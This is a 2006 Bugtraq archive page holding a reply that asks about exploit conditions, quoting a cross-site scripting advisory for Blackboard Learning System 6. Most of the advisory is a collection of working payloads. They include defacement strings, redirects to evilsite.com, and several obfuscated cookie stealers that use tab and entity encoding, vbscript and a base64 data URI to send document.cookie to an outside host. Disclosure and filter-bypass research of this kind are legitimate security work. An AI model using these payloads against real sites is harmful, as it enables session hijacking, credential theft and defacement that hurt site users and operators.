lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-id: <44EBA804.1040502@gci.net>
Date: Tue, 22 Aug 2006 16:57:40 -0800
From: "C. Hamby" <fixer@....net>
To: Pr070n@...il.com
Cc: bugtraq@...urityfocus.com
Subject: Re: BlackBoard Multiple Vulnerabilities (XSS)

What type of an account do you have to have and in what sections can
this be exploited?
Also, has Blackboard verified this in their current release (7.1)?

-cdh


Pr070n@...il.com wrote:
> -----------------------------------------------------------------------------------------
> 
> 
> Found by: PrOtOn & digi7al64
> 
> 
> Date: May 20th 2006
> 
> 
> Critical Level: High
> 
> 
> Type: Multiple Cross Site Scripting (XSS) vunerabilities
> 
> 
> 
> ------------------------------------------------------------------------------------------
> 
> 
> 
> Software:
> 
> Blackboard Learning System (Release 6) Blackboard Learning and Community Portal Suite (Release6)-6.2.3.23
> 
> 
> 
> ------------------------------------------------------------------------------------------
> 
> 
> 
> Explanation: You can inject HTML, VB code and or Javascript into specific tags to steal 
> 
> cookies, deface the site using frame busters or even redirect to external sites for phishing purposes. 
> 
> If you have limited access, then a simple post into the Discussion Board using the right 
> 
> tags with the right code (provided below) will execute the vulnerability(ies).
> 
> 
> 
> -------------------------------------------------------------------------------------------
> 
> 
> About:
> 
> Blackboards parsing system only checks for the string "javascript", Thus vbscript code can be injected at will into tags as well as any versions of javascript that uses uncommon syntax (ie tabs encoding etc)
> 
> 
> -------------------------------------------------------------------------------------------
> 
> Vulnerabilities:
> 
> 
> Defacement (FrameBuster)
> 
> -------------------------
> 
> <meta http-equiv="refresh"
> 
> content="15;url= http://evilsite.com">
> 
> 
> 
> Defacement (FrameBuster)
> 
> -------------------------
> 
> <iframe src=" http://evilsite.com" width=100
> 
> height=100></iframe>
> 
> 
> 
> Defacement (IE ONLY)
> 
> -------------------------
> 
> <img src=vbscript:document.write("defaced_by_insane_script_kiddies")>
> 
> 
> 
> Defacement (IE ONLY)
> 
> -------------------------
> 
> <link rel="stylesheet"
> 
> href=vbscript:document.write("defaced_by_insane_script_kiddies")>
> 
> 
> <img src=vb script:document.write("defaced_by_insane_script_kiddies")>
> 
> 
> 
> Cookie Stealer (IE ONLY)
> 
> -------------------------
> 
> 
> <img
> 
> src="vbscript:wintest=window.open(%22http://evilsite.com + document.cookie)"style=visibility:hidden/>
> 
> <img src="vbscript:window.focus ()"style=visibility:hidden/>
> 
> <img src="vbscript: window.close()"style=visibility:hidden/>
> 
> 
> 
> Cookie Stealer (IE ONLY)
> 
> -------------------------
> 
> <link rel="stylesheet"
> 
> href="vbscript:wintest=window.open(%22http://evilsite.com+document.cookie)">
> 
> 
> 
> Cookie Stealer (Encoded Tab - IE ONLY)
> 
> -------------------------
> 
> <img
> 
> src="jav&#x09;ascript: document.images[1].src=%22http://evilsite.com+document.cookie;"<img src="jav
> 
> ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>
> 
> 
> 
> Cookie Stealer (html encoded - IE ONLY)
> 
> -------------------------
> 
> <img
> 
> src='&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;document.images[1].s
> 
> rc=" http://evilsite.com"+document.cookie;'<img
> 
> src="jav
> 
> ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>
> 
> 
> 
> Cookie Stealer (tabs - IE ONLY)
> 
> -------------------------
> 
> <img src="jav
> 
> ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>
> 
> 
> 
> Cookie Stealer (body tag with tabs - IE ONLY)
> 
> -------------------------
> 
> <body background="jav
> 
> ascript:document.images[1].src=%22http://evilsite.com+document.cookie;">
> 
> 
> 
> Cookie Stealer (div tag with tabs - IE ONLY)
> 
> -------------------------
> 
> <div style="background-image: url(jav
> 
> ascript:document.images[1].src=%22http://evilsite.com+document.cookie;)">
> 
> 
> 
> Cookie Stealer (firefox)
> 
> -------------------------
> 
> <META HTTP-EQUIV="refresh"
> 
> CONTENT="0;url=data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">
> 
> 
> 
> Cookie Stealer (firefox - click to work)
> 
> -------------------------
> 
> <a
> 
> href="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">hmmm</a>  
> 
> 
> 
> ---------------------------------------------------------------------------------------------
> 
> 
> 
> Disclaimer:
> 
> Myself or any other person involved with this discovery will not be responsible for what you 
> 
> do with this information.
> 
> Blackboard developers have been contacted by me and a patch has been released according to them.
> 
> 
> 
> -----------------------------------------------------------------------------------------------
> 
> 
> 
> Shout Outs:
> 
> r0xes, criticalsecurity(dot)net, Infowar(dot)com
> 
> 
> 
> ------------------------------------------------------------------------------------------------
> 
> 
> 
> Contact:
> 
> Pr070n(at)gmail(dot)com
> 
> Digi7al64(at)gmail(dot)com
> 
> 
> 
> -------------------------------------------------------------------------------------------------
> 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ